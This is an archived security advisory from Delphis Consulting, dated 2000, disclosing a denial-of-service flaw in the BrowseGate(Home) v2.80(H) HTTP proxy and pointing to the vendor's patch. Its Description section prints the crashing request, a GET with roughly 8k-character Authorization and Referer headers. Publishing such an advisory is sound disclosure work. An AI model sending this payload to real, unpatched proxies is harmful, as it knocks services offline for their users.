DST2K0031: DoS in BrowseGate(Home) v2.80(H)

[Security Team <SecurityTeam () DELPHISPLC COM>]

============================================================================
                            Delphis Consulting Plc
============================================================================

                           Security Team Advisories
                               [18/09/2000]

                            securityteam () delphisplc com
                  [http://www.delphisplc.com/thinking/whitepapers/]
        
============================================================================
Adv     :       DST2K0031
Title   :       DoS in BrowseGate(Home) v2.80(H)
Author  :       DCIST (securityteam () delphisplc com)
O/S     :       Microsoft Windows Nt 2000 Professional (SP1)
Product :       BrowseGate(Home) v2.80(H)
Date    :       18/09/2000

I.    Description

II.   Solution

III.  Disclaimer


============================================================================

I. Description
============================================================================

Vendor URL: http://www.netcplus.com/

Delphis Consulting Internet Security Team (DCIST) discovered the following
vulnerability in Browsegate under Windows NT.

Severity: medium

It is possible to cause Browsegate to crash with an invalid read error.
This is done by connecting to port 80 upon which the HTTP proxy listens
on and sending the following.

GET / HTTP/1.0<cr>
Authorization: Basic(A x 8k)<cr>
From: dcist () delphisplc com<cr>
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
Referer: http://www.delphisplc.com/(A x 8k)<cr>
UserAgent: DCIST Browser 1.1<cr>
<cr><cr>

This will cause an error brwgate.exe to crash with it's own error handler
twice complaining that memory can not be written or read.

II. Solution
============================================================================

Vendor Status: Informed

Delphis have worked with NetCPlus to resolve the above issue and are happy
to
announce that a patch is availible from their web site:

Site: http://www.netcplus.com
Version: v2.80.001

Delphis would like to take this oppertunity to thank Ian Turner and the
developers at Netcplus at the speed they responded.

III. Disclaimer
============================================================================
THE INFORMATION CONTAINED IN THIS ADVISORY IS BELIEVED TO BE ACCURATE AT
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS GIVEN, EXPRESS OR
IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS.  NEITHER THE AUTHOR NOR THE
PUBLISHER ACCEPTS ANY LIABILITY WHATSOEVER FOR ANY DIRECT, INDIRECT OR
CONSEQUENTIAL LOSS OR DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE
PLACED ON, THIS INFORMATION FOR ANY PURPOSE.
============================================================================
This e-mail and any files transmitted with it are intended solely for the
addressee and are confidential. They may also be legally
privileged.Copyright in them is reserved by Delphis Consulting PLC
["Delphis"] and they must not be disclosed to, or used by, anyone other than
the addressee.If you have received this e-mail and any accompanying files in
error, you may not copy, publish or use them in any way and you should
delete them from your system and notify us immediately.E-mails are not
secure.  Delphis does not accept responsibility for changes to e-mails that
occur after they have been sent.  Any opinions expressed in this e-mail may
be personal to the author and may not necessarily reflect the opinions of
Delphis